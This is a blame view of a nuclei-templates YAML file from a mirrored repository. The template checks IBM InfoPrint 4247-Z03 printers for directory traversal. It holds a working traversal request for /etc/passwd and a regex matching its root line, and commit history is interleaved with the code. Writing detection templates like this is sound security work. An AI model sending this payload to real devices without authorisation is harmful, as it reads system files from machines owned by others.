daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/vulnerabilities/ibm/ibm-infoprint-lfi.yaml

24 lines
592 B
YAML
Raw Normal View History

Normalized id fields to match schema regex
2020-09-15 19:25:55 +00:00
id: ibm-infoprint-lfi
Create ibm-infoprint-directory-traversal IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal
2020-07-07 12:10:48 +00:00
info:
name: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal
Updated author names
2021-06-09 12:20:56 +00:00
author: harshbothra_
add few descriptions add few descriptions and references on /vulnerabilities/ templates.
2020-08-25 19:43:43 +00:00
severity: medium
description: Directory traversal vulnerability on IBM InfoPrint 4247-Z03 Impact Matrix Printer.
Adding tags to vulnerabilities and workflows
2021-02-12 05:53:01 +00:00
reference: https://www.exploit-db.com/exploits/47835
tags: ibm,lfi
Create ibm-infoprint-directory-traversal IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal
2020-07-07 12:10:48 +00:00
requests:
- method: GET
path:
Replace shadow by passwd
2020-09-17 08:13:19 +00:00
- '{{BaseURL}}/./../../../../../../../../../../etc/passwd'
Create ibm-infoprint-directory-traversal IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal
2020-07-07 12:10:48 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 200
Adapt matcher to passwd
2020-09-17 08:15:41 +00:00
- type: regex
regex:
matcher update to handle edge cases
2021-07-24 21:35:55 +00:00
- "root:.*:0:0"
Adapt matcher to passwd
2020-09-17 08:15:41 +00:00
part: body